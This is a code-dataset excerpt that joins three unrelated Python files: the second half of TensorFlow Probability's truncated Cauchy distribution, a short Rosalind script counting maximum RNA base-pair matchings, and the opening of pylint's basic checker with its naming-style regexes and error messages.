loc, scale, low, high = self._loc_scale_low_high()
batch_shape = self._batch_shape_tensor(
loc=loc, scale=scale, low=low, high=high)
sample_and_batch_shape = ps.concat([[n], batch_shape], axis=0)
u = samplers.uniform(sample_and_batch_shape, dtype=self.dtype, seed=seed)
return self._quantile(u, loc=loc, scale=scale, low=low, high=high)
def _log_prob(self, x):
loc, scale, low, high = self._loc_scale_low_high()
log_prob = (
-tf.math.log1p(tf.square((x - loc) / scale))
- (np.log(np.pi) + tf.math.log(scale))
- self._log_normalizer(loc=loc, scale=scale, low=low, high=high))
# p(x) is 0 outside the bounds.
return tf.where((x > high) | (x < low),
dtype_util.as_numpy_dtype(x.dtype)(-np.inf),
log_prob)
def _cdf(self, x):
loc, scale, low, high = self._loc_scale_low_high()
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
return tf.clip_by_value(
((_cauchy_cdf_diff((x - loc) / scale, std_low))
/ self._normalizer(std_low=std_low, std_high=std_high)),
clip_value_min=0., clip_value_max=1.)
def _log_cdf(self, x):
loc, scale, low, high = self._loc_scale_low_high()
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
return (
tf.math.log(_cauchy_cdf_diff((x - loc) / scale, std_low))
- self._log_normalizer(std_low=std_low, std_high=std_high))
def _mean(self):
loc, scale, low, high = self._loc_scale_low_high()
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
# Formula from David Olive, "Applied Robust Statistics" --
# see http://parker.ad.siu.edu/Olive/ch4.pdf .
t = (tf.math.log1p(tf.math.square(std_high))
- tf.math.log1p(tf.math.square(std_low)))
t = t / (2 * tfp_math.atan_difference(std_high, std_low))
return loc + scale * t
def _mode(self):
# mode = { loc: for low <= loc <= high
# low: for loc < low
# high: for loc > high
# }
loc = tf.convert_to_tensor(self.loc)
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
shape = self._batch_shape_tensor(loc=loc, low=low, high=high)
# We *must* broadcast with scale to get a correctly shaped output, but
# TODO(b/141460015): we should not have to explicitly broadcast the first
# parameter to clip_by_value to align with the second and third parameters.
return tf.clip_by_value(tf.broadcast_to(loc, shape), low, high)
def _variance(self):
loc, scale, low, high = self._loc_scale_low_high()
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
# Formula from David Olive, "Applied Robust Statistics" --
# see http://parker.ad.siu.edu/Olive/ch4.pdf .
atan_diff = tfp_math.atan_difference(std_high, std_low)
t = (std_high - std_low - atan_diff) / atan_diff
std_mean = ((tf.math.log1p(tf.math.square(std_high))
- tf.math.log1p(tf.math.square(std_low))) / (2 * atan_diff))
return tf.math.square(scale) * (t - tf.math.square(std_mean))
def _quantile(self, p, loc=None, scale=None, low=None, high=None):
loc, scale, low, high = self._loc_scale_low_high(loc, scale, low, high)
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
# Use the sum of tangents formula.
# First, the quantile of the cauchy distribution is tan(pi * (x - 0.5)).
# and the cdf of the cauchy distribution is 0.5 + arctan(x) / np.pi
# WLOG, we will assume loc = 0 , scale = 1 (these can be taken in to account
# by rescaling and shifting low and high, and then scaling the output).
# We would like to compute quantile(p * (cdf(high) - cdf(low)) + cdf(low))
# This is the same as:
# tan(pi * (cdf(low) + (cdf(high) - cdf(low)) * p - 0.5))
# Let a = pi * (cdf(low) - 0.5), b = pi * (cdf(high) - cdf(low)) * u
# By using the formula for the cdf we have:
# a = arctan(low), b = arctan_difference(high, low) * u
# Thus the quantile is now tan(a + b).
# By appealing to the sum of tangents formula we have:
# tan(a + b) = (tan(a) + tan(b)) / (1 - tan(a) * tan(b)) =
# (low + tan(b)) / (1 - low * tan(b))
# Thus for a 'standard' truncated cauchy we have the quantile as:
# quantile(p) = (low + tan(b)) / (1 - low * tan(b)) where
# b = arctan_difference(high, low) * p.
tanb = tf.math.tan(tfp_math.atan_difference(std_high, std_low) * p)
x = (std_low + tanb) / (1 - std_low * tanb)
# Clip the answer to prevent it from falling numerically outside
# the support.
return numeric.clip_by_value_preserve_gradient(
x * scale + loc, clip_value_min=low, clip_value_max=high)
def _default_event_space_bijector(self):
return sigmoid_bijector.Sigmoid(
low=self.low, high=self.high, validate_args=self.validate_args)
def _parameter_control_dependencies(self, is_init):
if not self.validate_args:
return []
assertions = []
low = None
high = None
if is_init != tensor_util.is_ref(self.low):
low = tf.convert_to_tensor(self.low)
assertions.append(
assert_util.assert_finite(low, message='`low` is not finite'))
if is_init != tensor_util.is_ref(self.high):
high = tf.convert_to_tensor(self.high)
assertions.append(
assert_util.assert_finite(high, message='`high` is not finite'))
if is_init != tensor_util.is_ref(self.loc):
assertions.append(
assert_util.assert_finite(self.loc, message='`loc` is not finite'))
if is_init != tensor_util.is_ref(self.scale):
scale = tf.convert_to_tensor(self.scale)
assertions.extend([
assert_util.assert_positive(
scale, message='`scale` must be positive'),
assert_util.assert_finite(scale, message='`scale` is not finite'),
])
if (is_init != tensor_util.is_ref(self.low) or
is_init != tensor_util.is_ref(self.high)):
low = tf.convert_to_tensor(self.low) if low is None else low
high = tf.convert_to_tensor(self.high) if high is None else high
assertions.append(
assert_util.assert_greater(
high,
low,
message='TruncatedCauchy not defined when `low >= high`.'))
return assertions
def _sample_control_dependencies(self, x):
assertions = []
if not self.validate_args:
return assertions
assertions.append(assert_util.assert_greater_equal(
x, self.low, message='Sample must be greater than or equal to `low`.'))
assertions.append(assert_util.assert_less_equal(
x, self.high, message='Sample must be less than or equal to `high`.'))
return assertions
| tensorflow_probability/python/distributions/truncated_cauchy.py | 15,816 | The Truncated Cauchy distribution.
The truncated Cauchy is a Cauchy distribution bounded between `low`
and `high` (the pdf is 0 outside these bounds and renormalized).
Samples from this distribution are differentiable with respect to `loc`
and `scale`, but not with respect to the bounds `low` and `high`.
### Mathematical Details
The probability density function (pdf) of this distribution is:
```none
pdf(x; loc, scale, low, high) =
{ 1 / (pi * scale * (1 + z**2) * A) for low <= x <= high
{ 0 otherwise
z = (x - loc) / scale
A = CauchyCDF((high - loc) / scale) - CauchyCDF((low - loc) / scale)
```
where:
* `CauchyCDF` is the cumulative density function of the Cauchy distribution
with 0 mean and unit variance.
This is a scalar distribution so the event shape is always scalar and the
dimensions of the parameters define the batch_shape.
#### Examples
```python
tfd = tfp.distributions
# Define a batch of two scalar TruncatedCauchy distributions with modes
# at 0. and 1.0 .
dist = tfd.TruncatedCauchy(loc=[0., 1.], scale=1.,
low=[-1., 0.],
high=[1., 1.])
# Evaluate the pdf of the distributions at 0.5 and 0.8 respectively returning
# a 2-vector tensor.
dist.prob([0.5, 0.8])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
Construct a TruncatedCauchy.
All parameters of the distribution will be broadcast to the same shape,
so the resulting distribution will have a batch_shape of the broadcast
shape of all parameters.
Args:
loc: Floating point tensor; the modes of the corresponding non-truncated
Cauchy distribution(s).
scale: Floating point tensor; the scales of the distribution(s).
Must contain only positive values.
low: `float` `Tensor` representing lower bound of the distribution's
support. Must be such that `low < high`.
high: `float` `Tensor` representing upper bound of the distribution's
support. Must be such that `low < high`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked at run-time.
allow_nan_stats: Python `bool`, default `True`. When `True`,
statistics (e.g., mean, mode, variance) use the value '`NaN`' to
indicate the result is undefined. When `False`, an exception is raised
if one or more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
The Truncated Cauchy distribution class.
Copyright 2020 The TensorFlow Probability Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================ Dependency imports Samples do not have gradients with respect to `_low` and `_high`. TODO(b/161297284): Implement these gradients. pylint: disable=g-long-lambda TODO(b/169874884): Support decoupled parameterization. pylint: enable=g-long-lambda p(x) is 0 outside the bounds. Formula from David Olive, "Applied Robust Statistics" -- see http://parker.ad.siu.edu/Olive/ch4.pdf . mode = { loc: for low <= loc <= high low: for loc < low high: for loc > high } We *must* broadcast with scale to get a correctly shaped output, but TODO(b/141460015): we should not have to explicitly broadcast the first parameter to clip_by_value to align with the second and third parameters. Formula from David Olive, "Applied Robust Statistics" -- see http://parker.ad.siu.edu/Olive/ch4.pdf . Use the sum of tangents formula. First, the quantile of the cauchy distribution is tan(pi * (x - 0.5)). and the cdf of the cauchy distribution is 0.5 + arctan(x) / np.pi WLOG, we will assume loc = 0 , scale = 1 (these can be taken in to account by rescaling and shifting low and high, and then scaling the output). We would like to compute quantile(p * (cdf(high) - cdf(low)) + cdf(low)) This is the same as: tan(pi * (cdf(low) + (cdf(high) - cdf(low)) * p - 0.5)) Let a = pi * (cdf(low) - 0.5), b = pi * (cdf(high) - cdf(low)) * u By using the formula for the cdf we have: a = arctan(low), b = arctan_difference(high, low) * u Thus the quantile is now tan(a + b). By appealing to the sum of tangents formula we have: tan(a + b) = (tan(a) + tan(b)) / (1 - tan(a) * tan(b)) = (low + tan(b)) / (1 - low * tan(b)) Thus for a 'standard' truncated cauchy we have the quantile as: quantile(p) = (low + tan(b)) / (1 - low * tan(b)) where b = arctan_difference(high, low) * p. Clip the answer to prevent it from falling numerically outside the support. | 4,998 | en | 0.791131 |
# http://rosalind.info/problems/mmch/
from math import factorial
def nPr(n, k):
'''Returns the number of k-permutations of n.'''
return factorial(n) / factorial(n-k)
f = open("rosalind_mmch.txt", "r")
dnas = {}
currentKey = ''
for content in f:
# Beginning of a new sample
if '>' in content:
key = content.rstrip().replace('>', '')
currentKey = key
dnas[currentKey] = ''
else:
dnas[currentKey] += content.rstrip()
string = dnas[currentKey]
nbAU = [string.count(c) for c in 'AU']
nbGC = [string.count(c) for c in 'GC']
# There are nPr(max, min) edges for each AU, CG.
# Total number of edges is then the product.
maxNbMatchings = nPr(max(nbAU), min(nbAU)) * nPr(max(nbGC), min(nbGC))
print maxNbMatchings
| rosalind/mmch.py | 762 | http://rosalind.info/problems/mmch/ Beginning of a new sample There are nPr(max, min) edges for each AU, CG. Total number of edges is then the product. | 151 | en | 0.765164 |
# Copyright (c) 2006-2016 LOGILAB S.A. (Paris, FRANCE) <contact@logilab.fr>
# Copyright (c) 2010 Daniel Harding <dharding@gmail.com>
# Copyright (c) 2012-2014 Google, Inc.
# Copyright (c) 2013-2020 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2014 Brett Cannon <brett@python.org>
# Copyright (c) 2014 Arun Persaud <arun@nubati.net>
# Copyright (c) 2015 Nick Bastin <nick.bastin@gmail.com>
# Copyright (c) 2015 Michael Kefeder <oss@multiwave.ch>
# Copyright (c) 2015 Dmitry Pribysh <dmand@yandex.ru>
# Copyright (c) 2015 Stephane Wirtel <stephane@wirtel.be>
# Copyright (c) 2015 Cosmin Poieana <cmin@ropython.org>
# Copyright (c) 2015 Florian Bruhin <me@the-compiler.org>
# Copyright (c) 2015 Radu Ciorba <radu@devrandom.ro>
# Copyright (c) 2015 Ionel Cristian Maries <contact@ionelmc.ro>
# Copyright (c) 2016, 2019 Ashley Whetter <ashley@awhetter.co.uk>
# Copyright (c) 2016, 2018 Jakub Wilk <jwilk@jwilk.net>
# Copyright (c) 2016-2017 Łukasz Rogalski <rogalski.91@gmail.com>
# Copyright (c) 2016 Glenn Matthews <glenn@e-dad.net>
# Copyright (c) 2016 Elias Dorneles <eliasdorneles@gmail.com>
# Copyright (c) 2016 Yannack <yannack@users.noreply.github.com>
# Copyright (c) 2016 Alex Jurkiewicz <alex@jurkiewi.cz>
# Copyright (c) 2017, 2019-2021 Pierre Sassoulas <pierre.sassoulas@gmail.com>
# Copyright (c) 2017, 2019-2021 hippo91 <guillaume.peillex@gmail.com>
# Copyright (c) 2017 danields <danields761@gmail.com>
# Copyright (c) 2017 Jacques Kvam <jwkvam@gmail.com>
# Copyright (c) 2017 ttenhoeve-aa <ttenhoeve@appannie.com>
# Copyright (c) 2018-2019 Nick Drozd <nicholasdrozd@gmail.com>
# Copyright (c) 2018-2019 Ville Skyttä <ville.skytta@iki.fi>
# Copyright (c) 2018 Sergei Lebedev <185856+superbobry@users.noreply.github.com>
# Copyright (c) 2018 Lucas Cimon <lucas.cimon@gmail.com>
# Copyright (c) 2018 ssolanki <sushobhitsolanki@gmail.com>
# Copyright (c) 2018 Natalie Serebryakova <natalie.serebryakova@Natalies-MacBook-Pro.local>
# Copyright (c) 2018 Sushobhit <31987769+sushobhit27@users.noreply.github.com>
# Copyright (c) 2018 SergeyKosarchuk <sergeykosarchuk@gmail.com>
# Copyright (c) 2018 Steven M. Vascellaro <svascellaro@gmail.com>
# Copyright (c) 2018 Mike Frysinger <vapier@gmail.com>
# Copyright (c) 2018 Chris Lamb <chris@chris-lamb.co.uk>
# Copyright (c) 2018 glmdgrielson <32415403+glmdgrielson@users.noreply.github.com>
# Copyright (c) 2019 Daniel Draper <Germandrummer92@users.noreply.github.com>
# Copyright (c) 2019 Hugo van Kemenade <hugovk@users.noreply.github.com>
# Copyright (c) 2019 Niko Wenselowski <niko@nerdno.de>
# Copyright (c) 2019 Nikita Sobolev <mail@sobolevn.me>
# Copyright (c) 2019 Oisín Moran <OisinMoran@users.noreply.github.com>
# Copyright (c) 2019 Fantix King <fantix@uchicago.edu>
# Copyright (c) 2020 Peter Kolbus <peter.kolbus@gmail.com>
# Copyright (c) 2020 ethan-leba <ethanleba5@gmail.com>
# Copyright (c) 2020 へーさん <hira9603859504@gmail.com>
# Copyright (c) 2020 Damien Baty <damien.baty@polyconseil.fr>
# Copyright (c) 2020 Ram Rachum <ram@rachum.com>
# Copyright (c) 2020 Anthony Sottile <asottile@umich.edu>
# Copyright (c) 2020 bernie gray <bfgray3@users.noreply.github.com>
# Copyright (c) 2020 Gabriel R Sezefredo <g@briel.dev>
# Copyright (c) 2020 Benny <benny.mueller91@gmail.com>
# Copyright (c) 2020 Anubhav <35621759+anubh-v@users.noreply.github.com>
# Copyright (c) 2021 Marc Mueller <30130371+cdce8p@users.noreply.github.com>
# Copyright (c) 2021 Andreas Finkler <andi.finkler@gmail.com>
# Copyright (c) 2021 Or Bahari <orbahari@mail.tau.ac.il>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/LICENSE
"""basic checker for Python code"""
import builtins
import collections
import itertools
import re
import sys
from typing import Pattern
import astroid
from pylint import checkers, exceptions, interfaces
from pylint import utils as lint_utils
from pylint.checkers import utils
from pylint.checkers.utils import (
is_overload_stub,
is_property_deleter,
is_property_setter,
)
from pylint.reporters.ureports import nodes as reporter_nodes
class NamingStyle:
"""It may seem counterintuitive that single naming style has multiple "accepted"
forms of regular expressions, but we need to special-case stuff like dunder names
in method names."""
ANY: Pattern[str] = re.compile(".*")
CLASS_NAME_RGX: Pattern[str] = ANY
MOD_NAME_RGX: Pattern[str] = ANY
CONST_NAME_RGX: Pattern[str] = ANY
COMP_VAR_RGX: Pattern[str] = ANY
DEFAULT_NAME_RGX: Pattern[str] = ANY
CLASS_ATTRIBUTE_RGX: Pattern[str] = ANY
@classmethod
def get_regex(cls, name_type):
return {
"module": cls.MOD_NAME_RGX,
"const": cls.CONST_NAME_RGX,
"class": cls.CLASS_NAME_RGX,
"function": cls.DEFAULT_NAME_RGX,
"method": cls.DEFAULT_NAME_RGX,
"attr": cls.DEFAULT_NAME_RGX,
"argument": cls.DEFAULT_NAME_RGX,
"variable": cls.DEFAULT_NAME_RGX,
"class_attribute": cls.CLASS_ATTRIBUTE_RGX,
"class_const": cls.CONST_NAME_RGX,
"inlinevar": cls.COMP_VAR_RGX,
}[name_type]
class SnakeCaseStyle(NamingStyle):
"""Regex rules for snake_case naming style."""
CLASS_NAME_RGX = re.compile(r"[^\W\dA-Z][^\WA-Z]+$")
MOD_NAME_RGX = re.compile(r"[^\W\dA-Z][^\WA-Z]*$")
CONST_NAME_RGX = re.compile(r"([^\W\dA-Z][^\WA-Z]*|__.*__)$")
COMP_VAR_RGX = re.compile(r"[^\W\dA-Z][^\WA-Z]*$")
DEFAULT_NAME_RGX = re.compile(
r"([^\W\dA-Z][^\WA-Z]{2,}|_[^\WA-Z]*|__[^\WA-Z\d_][^\WA-Z]+__)$"
)
CLASS_ATTRIBUTE_RGX = re.compile(r"([^\W\dA-Z][^\WA-Z]{2,}|__.*__)$")
class CamelCaseStyle(NamingStyle):
"""Regex rules for camelCase naming style."""
CLASS_NAME_RGX = re.compile(r"[^\W\dA-Z][^\W_]+$")
MOD_NAME_RGX = re.compile(r"[^\W\dA-Z][^\W_]*$")
CONST_NAME_RGX = re.compile(r"([^\W\dA-Z][^\W_]*|__.*__)$")
COMP_VAR_RGX = re.compile(r"[^\W\dA-Z][^\W_]*$")
DEFAULT_NAME_RGX = re.compile(r"([^\W\dA-Z][^\W_]{2,}|__[^\W\dA-Z_]\w+__)$")
CLASS_ATTRIBUTE_RGX = re.compile(r"([^\W\dA-Z][^\W_]{2,}|__.*__)$")
class PascalCaseStyle(NamingStyle):
"""Regex rules for PascalCase naming style."""
CLASS_NAME_RGX = re.compile(r"[^\W\da-z][^\W_]+$")
MOD_NAME_RGX = re.compile(r"[^\W\da-z][^\W_]+$")
CONST_NAME_RGX = re.compile(r"([^\W\da-z][^\W_]*|__.*__)$")
COMP_VAR_RGX = re.compile(r"[^\W\da-z][^\W_]+$")
DEFAULT_NAME_RGX = re.compile(r"([^\W\da-z][^\W_]{2,}|__[^\W\dA-Z_]\w+__)$")
CLASS_ATTRIBUTE_RGX = re.compile(r"[^\W\da-z][^\W_]{2,}$")
class UpperCaseStyle(NamingStyle):
"""Regex rules for UPPER_CASE naming style."""
CLASS_NAME_RGX = re.compile(r"[^\W\da-z][^\Wa-z]+$")
MOD_NAME_RGX = re.compile(r"[^\W\da-z][^\Wa-z]+$")
CONST_NAME_RGX = re.compile(r"([^\W\da-z][^\Wa-z]*|__.*__)$")
COMP_VAR_RGX = re.compile(r"[^\W\da-z][^\Wa-z]+$")
DEFAULT_NAME_RGX = re.compile(r"([^\W\da-z][^\Wa-z]{2,}|__[^\W\dA-Z_]\w+__)$")
CLASS_ATTRIBUTE_RGX = re.compile(r"[^\W\da-z][^\Wa-z]{2,}$")
class AnyStyle(NamingStyle):
pass
NAMING_STYLES = {
"snake_case": SnakeCaseStyle,
"camelCase": CamelCaseStyle,
"PascalCase": PascalCaseStyle,
"UPPER_CASE": UpperCaseStyle,
"any": AnyStyle,
}
# do not require a doc string on private/system methods
NO_REQUIRED_DOC_RGX = re.compile("^_")
REVERSED_PROTOCOL_METHOD = "__reversed__"
SEQUENCE_PROTOCOL_METHODS = ("__getitem__", "__len__")
REVERSED_METHODS = (SEQUENCE_PROTOCOL_METHODS, (REVERSED_PROTOCOL_METHOD,))
TYPECHECK_COMPARISON_OPERATORS = frozenset(("is", "is not", "==", "!="))
LITERAL_NODE_TYPES = (astroid.Const, astroid.Dict, astroid.List, astroid.Set)
UNITTEST_CASE = "unittest.case"
BUILTINS = builtins.__name__
TYPE_QNAME = "%s.type" % BUILTINS
ABC_METACLASSES = {"_py_abc.ABCMeta", "abc.ABCMeta"} # Python 3.7+,
# Name categories that are always consistent with all naming conventions.
EXEMPT_NAME_CATEGORIES = {"exempt", "ignore"}
# A mapping from qname -> symbol, to be used when generating messages
# about dangerous default values as arguments
DEFAULT_ARGUMENT_SYMBOLS = dict(
zip(
[".".join([BUILTINS, x]) for x in ("set", "dict", "list")],
["set()", "{}", "[]"],
),
**{
x: "%s()" % x
for x in (
"collections.deque",
"collections.ChainMap",
"collections.Counter",
"collections.OrderedDict",
"collections.defaultdict",
"collections.UserDict",
"collections.UserList",
)
},
)
REVERSED_COMPS = {"<": ">", "<=": ">=", ">": "<", ">=": "<="}
COMPARISON_OPERATORS = frozenset(("==", "!=", "<", ">", "<=", ">="))
# List of methods which can be redefined
REDEFINABLE_METHODS = frozenset(("__module__",))
TYPING_FORWARD_REF_QNAME = "typing.ForwardRef"
def _redefines_import(node):
"""Detect that the given node (AssignName) is inside an
exception handler and redefines an import from the tryexcept body.
Returns True if the node redefines an import, False otherwise.
"""
current = node
while current and not isinstance(current.parent, astroid.ExceptHandler):
current = current.parent
if not current or not utils.error_of_type(current.parent, ImportError):
return False
try_block = current.parent.parent
for import_node in try_block.nodes_of_class((astroid.ImportFrom, astroid.Import)):
for name, alias in import_node.names:
if alias:
if alias == node.name:
return True
elif name == node.name:
return True
return False
def in_loop(node):
"""return True if the node is inside a kind of for loop"""
parent = node.parent
while parent is not None:
if isinstance(
parent,
(
astroid.For,
astroid.ListComp,
astroid.SetComp,
astroid.DictComp,
astroid.GeneratorExp,
),
):
return True
parent = parent.parent
return False
def in_nested_list(nested_list, obj):
"""return true if the object is an element of <nested_list> or of a nested
list
"""
for elmt in nested_list:
if isinstance(elmt, (list, tuple)):
if in_nested_list(elmt, obj):
return True
elif elmt == obj:
return True
return False
def _get_break_loop_node(break_node):
"""
Returns the loop node that holds the break node in arguments.
Args:
break_node (astroid.Break): the break node of interest.
Returns:
astroid.For or astroid.While: the loop node holding the break node.
"""
loop_nodes = (astroid.For, astroid.While)
parent = break_node.parent
while not isinstance(parent, loop_nodes) or break_node in getattr(
parent, "orelse", []
):
break_node = parent
parent = parent.parent
if parent is None:
break
return parent
def _loop_exits_early(loop):
"""
Returns true if a loop may ends up in a break statement.
Args:
loop (astroid.For, astroid.While): the loop node inspected.
Returns:
bool: True if the loop may ends up in a break statement, False otherwise.
"""
loop_nodes = (astroid.For, astroid.While)
definition_nodes = (astroid.FunctionDef, astroid.ClassDef)
inner_loop_nodes = [
_node
for _node in loop.nodes_of_class(loop_nodes, skip_klass=definition_nodes)
if _node != loop
]
return any(
_node
for _node in loop.nodes_of_class(astroid.Break, skip_klass=definition_nodes)
if _get_break_loop_node(_node) not in inner_loop_nodes
)
def _is_multi_naming_match(match, node_type, confidence):
return (
match is not None
and match.lastgroup is not None
and match.lastgroup not in EXEMPT_NAME_CATEGORIES
and (node_type != "method" or confidence != interfaces.INFERENCE_FAILURE)
)
BUILTIN_PROPERTY = "builtins.property"
def _get_properties(config):
"""Returns a tuple of property classes and names.
Property classes are fully qualified, such as 'abc.abstractproperty' and
property names are the actual names, such as 'abstract_property'.
"""
property_classes = {BUILTIN_PROPERTY}
property_names = set() # Not returning 'property', it has its own check.
if config is not None:
property_classes.update(config.property_classes)
property_names.update(
prop.rsplit(".", 1)[-1] for prop in config.property_classes
)
return property_classes, property_names
def _determine_function_name_type(node: astroid.FunctionDef, config=None):
"""Determine the name type whose regex the a function's name should match.
:param node: A function node.
:param config: Configuration from which to pull additional property classes.
:type config: :class:`optparse.Values`
:returns: One of ('function', 'method', 'attr')
:rtype: str
"""
property_classes, property_names = _get_properties(config)
if not node.is_method():
return "function"
if is_property_setter(node) or is_property_deleter(node):
# If the function is decorated using the prop_method.{setter,getter}
# form, treat it like an attribute as well.
return "attr"
if node.decorators:
decorators = node.decorators.nodes
else:
decorators = []
for decorator in decorators:
# If the function is a property (decorated with @property
# or @abc.abstractproperty), the name type is 'attr'.
if isinstance(decorator, astroid.Name) or (
isinstance(decorator, astroid.Attribute)
and decorator.attrname in property_names
):
inferred = utils.safe_infer(decorator)
if (
inferred
and hasattr(inferred, "qname")
and inferred.qname() in property_classes
):
return "attr"
return "method"
def _has_abstract_methods(node):
"""
Determine if the given `node` has abstract methods.
The methods should be made abstract by decorating them
with `abc` decorators.
"""
return len(utils.unimplemented_abstract_methods(node)) > 0
def report_by_type_stats(sect, stats, old_stats):
"""make a report of
* percentage of different types documented
* percentage of different types with a bad name
"""
# percentage of different types documented and/or with a bad name
nice_stats = {}
for node_type in ("module", "class", "method", "function"):
try:
total = stats[node_type]
except KeyError as e:
raise exceptions.EmptyReportError() from e
nice_stats[node_type] = {}
if total != 0:
try:
documented = total - stats["undocumented_" + node_type]
percent = (documented * 100.0) / total
nice_stats[node_type]["percent_documented"] = "%.2f" % percent
except KeyError:
nice_stats[node_type]["percent_documented"] = "NC"
try:
percent = (stats["badname_" + node_type] * 100.0) / total
nice_stats[node_type]["percent_badname"] = "%.2f" % percent
except KeyError:
nice_stats[node_type]["percent_badname"] = "NC"
lines = ("type", "number", "old number", "difference", "%documented", "%badname")
for node_type in ("module", "class", "method", "function"):
new = stats[node_type]
old = old_stats.get(node_type, None)
if old is not None:
diff_str = lint_utils.diff_string(old, new)
else:
old, diff_str = "NC", "NC"
lines += (
node_type,
str(new),
str(old),
diff_str,
nice_stats[node_type].get("percent_documented", "0"),
nice_stats[node_type].get("percent_badname", "0"),
)
sect.append(reporter_nodes.Table(children=lines, cols=6, rheaders=1))
def redefined_by_decorator(node):
"""return True if the object is a method redefined via decorator.
For example:
@property
def x(self): return self._x
@x.setter
def x(self, value): self._x = value
"""
if node.decorators:
for decorator in node.decorators.nodes:
if (
isinstance(decorator, astroid.Attribute)
and getattr(decorator.expr, "name", None) == node.name
):
return True
return False
class _BasicChecker(checkers.BaseChecker):
__implements__ = interfaces.IAstroidChecker
name = "basic"
class BasicErrorChecker(_BasicChecker):
msgs = {
"E0100": (
"__init__ method is a generator",
"init-is-generator",
"Used when the special class method __init__ is turned into a "
"generator by a yield in its body.",
),
"E0101": (
"Explicit return in __init__",
"return-in-init",
"Used when the special class method __init__ has an explicit "
"return value.",
),
"E0102": (
"%s already defined line %s",
"function-redefined",
"Used when a function / class / method is redefined.",
),
"E0103": (
"%r not properly in loop",
"not-in-loop",
"Used when break or continue keywords are used outside a loop.",
),
"E0104": (
"Return outside function",
"return-outside-function",
'Used when a "return" statement is found outside a function or method.',
),
"E0105": (
"Yield outside function",
"yield-outside-function",
'Used when a "yield" statement is found outside a function or method.',
),
"E0106": (
"Return with argument inside generator",
"return-arg-in-generator",
'Used when a "return" statement with an argument is found '
"outside in a generator function or method (e.g. with some "
'"yield" statements).',
{"maxversion": (3, 3)},
),
"E0107": (
"Use of the non-existent %s operator",
"nonexistent-operator",
"Used when you attempt to use the C-style pre-increment or "
"pre-decrement operator -- and ++, which doesn't exist in Python.",
),
"E0108": (
"Duplicate argument name %s in function definition",
"duplicate-argument-name",
"Duplicate argument names in function definitions are syntax errors.",
),
"E0110": (
"Abstract class %r with abstract methods instantiated",
"abstract-class-instantiated",
"Used when an abstract class with `abc.ABCMeta` as metaclass "
"has abstract methods and is instantiated.",
),
"W0120": (
"Else clause on loop without a break statement",
"useless-else-on-loop",
"Loops should only have an else clause if they can exit early "
"with a break statement, otherwise the statements under else "
"should be on the same scope as the loop itself.",
),
"E0112": (
"More than one starred expression in assignment",
"too-many-star-expressions",
"Emitted when there are more than one starred "
"expressions (`*x`) in an assignment. This is a SyntaxError.",
),
"E0113": (
"Starred assignment target must be in a list or tuple",
"invalid-star-assignment-target",
"Emitted when a star expression is used as a starred assignment target.",
),
"E0114": (
"Can use starred expression only in assignment target",
"star-needs-assignment-target",
"Emitted when a star expression is not used in an assignment target.",
),
"E0115": (
"Name %r is nonlocal and global",
"nonlocal-and-global",
"Emitted when a name is both nonlocal and global.",
),
"E0116": (
"'continue' not supported inside 'finally' clause",
"continue-in-finally",
"Emitted when the `continue` keyword is found "
"inside a finally clause, which is a SyntaxError.",
{"maxversion": (3, 8)},
),
"E0117": (
"nonlocal name %s found without binding",
"nonlocal-without-binding",
"Emitted when a nonlocal variable does not have an attached "
"name somewhere in the parent scopes",
),
"E0118": (
"Name %r is used prior to global declaration",
"used-prior-global-declaration",
"Emitted when a name is used prior a global declaration, "
"which results in an error since Python 3.6.",
{"minversion": (3, 6)},
),
}
@utils.check_messages("function-redefined")
def visit_classdef(self, node):
self._check_redefinition("class", node)
def _too_many_starred_for_tuple(self, assign_tuple):
starred_count = 0
for elem in assign_tuple.itered():
if isinstance(elem, astroid.Tuple):
return self._too_many_starred_for_tuple(elem)
if isinstance(elem, astroid.Starred):
starred_count += 1
return starred_count > 1
@utils.check_messages("too-many-star-expressions", "invalid-star-assignment-target")
def visit_assign(self, node):
# Check *a, *b = ...
assign_target = node.targets[0]
# Check *a = b
if isinstance(node.targets[0], astroid.Starred):
self.add_message("invalid-star-assignment-target", node=node)
if not isinstance(assign_target, astroid.Tuple):
return
if self._too_many_starred_for_tuple(assign_target):
self.add_message("too-many-star-expressions", node=node)
@utils.check_messages("star-needs-assignment-target")
def visit_starred(self, node):
"""Check that a Starred expression is used in an assignment target."""
if isinstance(node.parent, astroid.Call):
# f(*args) is converted to Call(args=[Starred]), so ignore
# them for this check.
return
if isinstance(
node.parent, (astroid.List, astroid.Tuple, astroid.Set, astroid.Dict)
):
# PEP 448 unpacking.
return
stmt = node.statement()
if not isinstance(stmt, astroid.Assign):
return
if stmt.value is node or stmt.value.parent_of(node):
self.add_message("star-needs-assignment-target", node=node)
@utils.check_messages(
"init-is-generator",
"return-in-init",
"function-redefined",
"return-arg-in-generator",
"duplicate-argument-name",
"nonlocal-and-global",
"used-prior-global-declaration",
)
def visit_functiondef(self, node):
self._check_nonlocal_and_global(node)
self._check_name_used_prior_global(node)
if not redefined_by_decorator(
node
) and not utils.is_registered_in_singledispatch_function(node):
self._check_redefinition(node.is_method() and "method" or "function", node)
# checks for max returns, branch, return in __init__
returns = node.nodes_of_class(
astroid.Return, skip_klass=(astroid.FunctionDef, astroid.ClassDef)
)
if node.is_method() and node.name == "__init__":
if node.is_generator():
self.add_message("init-is-generator", node=node)
else:
values = [r.value for r in returns]
# Are we returning anything but None from constructors
if any(v for v in values if not utils.is_none(v)):
self.add_message("return-in-init", node=node)
